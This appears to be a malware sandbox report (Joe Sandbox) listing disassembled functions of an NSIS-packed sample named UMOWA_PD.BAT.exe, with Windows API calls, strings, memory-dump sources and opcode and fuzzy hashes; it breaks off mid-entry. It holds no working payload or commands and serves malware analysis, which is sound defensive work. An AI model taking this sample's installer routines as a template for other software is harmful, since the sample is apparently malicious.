                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                    • String ID: Call$N
                                                                                    • API String ID: 3103080414-3438112850
                                                                                    • Opcode ID: d465d3d5382bb59059b47d3503e7a252332af71f120e52871dcbc052c6d80ab7
                                                                                    • Instruction ID: fa786ba7610ecb1ae21ae2169d8ef808fc0b2da043ab7544d4c43deaa2774949
                                                                                    • Opcode Fuzzy Hash: d465d3d5382bb59059b47d3503e7a252332af71f120e52871dcbc052c6d80ab7
                                                                                    • Instruction Fuzzy Hash: 7F61B3B1A00209BFDB10AF64DD85A6A7B79FB84354F00843AFB05B61D0D7B9AD61CF58
                                                                                    Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                    • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                    • DrawTextW.USER32(00000000,00428A20,000000FF,00000010,00000820), ref: 00401156
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                    • String ID: F
                                                                                    • API String ID: 941294808-1304234792
                                                                                    • Opcode ID: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                                                    • Instruction ID: d1034cbb9d528375343357a353c0022e70e8214492c202610c441178c5bfc5cd
                                                                                    • Opcode Fuzzy Hash: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                                                    • Instruction Fuzzy Hash: FC417B71800249AFCB058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB74DA55DFA4
                                                                                    Function 00406167 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,00406302,?,?), ref: 004061A2
                                                                                    • GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061AB
                                                                                      • Part of subcall function 00405F76: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F86
                                                                                      • Part of subcall function 00405F76: lstrlenA.KERNEL32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB8
                                                                                    • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061C8
                                                                                    • wsprintfA.USER32 ref: 004061E6
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,00000004,00426DA8,?,?,?,?,?), ref: 00406221
                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406230
                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406268
                                                                                    • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062BE
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004062CF
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062D6
                                                                                      • Part of subcall function 00406011: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\UMOWA_PD.BAT.exe,80000000,00000003), ref: 00406015
                                                                                      • Part of subcall function 00406011: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406037
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                    • String ID: %ls=%ls$[Rename]
                                                                                    • API String ID: 2171350718-461813615
                                                                                    • Opcode ID: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                                                    • Instruction ID: d8f03b5b48010a369f687ed07a259b5d04d98e8e290d987932ab0f9f84d7b5e4
                                                                                    • Opcode Fuzzy Hash: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                                                    • Instruction Fuzzy Hash: 89313230201325BFD6207B659D48F2B3A6CDF41714F12007EBA02F62C2EA7D98218ABD
                                                                                    Function 00404507 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00404524
                                                                                    • GetSysColor.USER32(00000000), ref: 00404562
                                                                                    • SetTextColor.GDI32(?,00000000), ref: 0040456E
                                                                                    • SetBkMode.GDI32(?,?), ref: 0040457A
                                                                                    • GetSysColor.USER32(?), ref: 0040458D
                                                                                    • SetBkColor.GDI32(?,?), ref: 0040459D
                                                                                    • DeleteObject.GDI32(?), ref: 004045B7
                                                                                    • CreateBrushIndirect.GDI32(?), ref: 004045C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2320649405-0
                                                                                    • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                    • Instruction ID: 524417ed32742d4b72cd17798d780815826fd18a7bcb7bb0f1ed1fdd1052d135
                                                                                    • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                    • Instruction Fuzzy Hash: B22135B1500705AFCB319F78DD08B577BF5AF81714B048A2DEA96A26E0D738D944CB54
                                                                                    Function 004067CF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,00434000,76E63420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406832
                                                                                    • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406841
                                                                                    • CharNextW.USER32(?,00434000,76E63420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406846
                                                                                    • CharPrevW.USER32(?,?,76E63420,C:\Users\user\AppData\Local\Temp\,00000000,004034D7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00406859
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Char$Next$Prev
                                                                                    • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 589700163-2977677972
                                                                                    • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                    • Instruction ID: 2d41fa7b6770246c30beeceb47eb68b435a53440eacd13368e2f30b8c56315d6
                                                                                    • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                    • Instruction Fuzzy Hash: A511935680121296DB303B14CC44ABB66E8AF54794F52C03FE999732C1E77C5C9296BD
                                                                                    Function 00404E5B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E76
                                                                                    • GetMessagePos.USER32 ref: 00404E7E
                                                                                    • ScreenToClient.USER32(?,?), ref: 00404E98
                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EAA
                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404ED0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$Send$ClientScreen
                                                                                    • String ID: f
                                                                                    • API String ID: 41195575-1993550816
                                                                                    • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                    • Instruction ID: cfceae8db68972c520d490933057d7cb8d8acba3ea2256e028311c612775fba1
                                                                                    • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                    • Instruction Fuzzy Hash: A3015E7190021CBADB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A418BA4
                                                                                    Function 00402F98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402FB6
                                                                                    • MulDiv.KERNEL32(0008A2A9,00000064,0008A4AD), ref: 00402FE1
                                                                                    • wsprintfW.USER32 ref: 00402FF1
                                                                                    • SetWindowTextW.USER32(?,?), ref: 00403001
                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403013
                                                                                    Strings
                                                                                    • verifying installer: %d%%, xrefs: 00402FEB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                    • String ID: verifying installer: %d%%
                                                                                    • API String ID: 1451636040-82062127
                                                                                    • Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                                    • Instruction ID: f83dc0eaaa7e9df2961e53678d13a3899a4bf5fcca0c0537cb294ee04905d4b1
                                                                                    • Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                                    • Instruction Fuzzy Hash: EF014F71640208BBEF209F60DD49FEE3B69AB44345F108039FA06A51D0DBB99A559F58
                                                                                    Function 6FE22655 Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6FE212BB: GlobalAlloc.KERNELBASE(00000040,?,6FE212DB,?,6FE2137F,00000019,6FE211CA,-000000A0), ref: 6FE212C5
                                                                                    • GlobalFree.KERNEL32(?), ref: 6FE22743
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6FE22778
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15222039276.000000006FE21000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FE20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15221966825.000000006FE20000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15222110605.000000006FE24000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15222184730.000000006FE26000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6fe20000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Free$Alloc
                                                                                    • String ID:
                                                                                    • API String ID: 1780285237-0
                                                                                    • Opcode ID: 0b0ea83a4a82acf7bab6de142d0f144e3fd931f44b898a219ea044c01a7c2854
                                                                                    • Instruction ID: bd1cacba86ced1bdfd28403bfa1b810bf95adaff297c42cc3024274c2a1303d4
                                                                                    • Opcode Fuzzy Hash: 0b0ea83a4a82acf7bab6de142d0f144e3fd931f44b898a219ea044c01a7c2854
                                                                                    • Instruction Fuzzy Hash: 8D31DE31519601DFEB168F68CA84C2A7FF7FB97314324422EF10183260FB7568669B62
                                                                                    Function 00402955 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
                                                                                    • GlobalFree.KERNEL32(?), ref: 00402A0B
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402A1E
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
                                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                    • String ID:
                                                                                    • API String ID: 2667972263-0
                                                                                    • Opcode ID: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                                                    • Instruction ID: 66908bbe9354c3b59104e874c770ae4161d9466efedc1f742b63756e9967f80f
                                                                                    • Opcode Fuzzy Hash: b07bb42a36a53ac2b652948ec131e563e6f6be8de0f89c4bf93d81cf64cebf1f
                                                                                    • Instruction Fuzzy Hash: 54319E71900128ABCF21AFA5CE49D9E7E79AF44364F10423AF514762E1CB794C429FA8
                                                                                    Function 00405EF8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 47stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00406521: lstrcpynW.KERNEL32(?,?,00000400,0040366E,00428A20,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040652E
                                                                                      • Part of subcall function 00405E9B: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nscE8.tmp,?,00405F0F,C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp, 4v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76E63420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405EA9
                                                                                      • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
                                                                                      • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6
                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nscE8.tmp,00000000,C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp, 4v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76E63420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405F51
                                                                                    • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp,00000000,C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp, 4v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76E63420,C:\Users\user\AppData\Local\Temp\), ref: 00405F61
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                    • String ID: 4v$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nscE8.tmp
                                                                                    • API String ID: 3248276644-361211508
                                                                                    • Opcode ID: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                                                    • Instruction ID: 4f97f4adca9055af25af7ef058e1e83d315c20be799ec2f088cafe79a8eb74c9
                                                                                    • Opcode Fuzzy Hash: db39f955a116f1e539d990513461dc7a207fa728de065fffbfa736c70f2b9a34
                                                                                    • Instruction Fuzzy Hash: DAF0F435115E5326D622323A2C49AAF1A05CEC2324B55453FF891B22C2DF3C89538DBE
                                                                                    Function 6FE22480 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 6FE225C2
                                                                                      • Part of subcall function 6FE212CC: lstrcpynW.KERNEL32(00000000,?,6FE2137F,00000019,6FE211CA,-000000A0), ref: 6FE212DC
                                                                                    • GlobalAlloc.KERNEL32(00000040), ref: 6FE22548
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FE22563
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15222039276.000000006FE21000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FE20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15221966825.000000006FE20000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15222110605.000000006FE24000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15222184730.000000006FE26000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6fe20000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                    • String ID:
                                                                                    • API String ID: 4216380887-0
                                                                                    • Opcode ID: 4e9d26238b5c17f24414a4a131f04647cdafdb78fbd67f49db4c1c16453f0f74
                                                                                    • Instruction ID: 6b14e27d5b8da15d792f736a1e871f2cc26efe8c9c7d38d4fbb9eac919c3c5aa
                                                                                    • Opcode Fuzzy Hash: 4e9d26238b5c17f24414a4a131f04647cdafdb78fbd67f49db4c1c16453f0f74
                                                                                    • Instruction Fuzzy Hash: 0A4101B1058305DFE724DF68D980E267FF9FBA6314F208A1EF40686281FB34A545CB62
                                                                                    Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,?), ref: 00401D9F
                                                                                    • GetClientRect.USER32(?,?), ref: 00401DEA
                                                                                    • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
                                                                                    • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
                                                                                    • DeleteObject.GDI32(00000000), ref: 00401E3E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
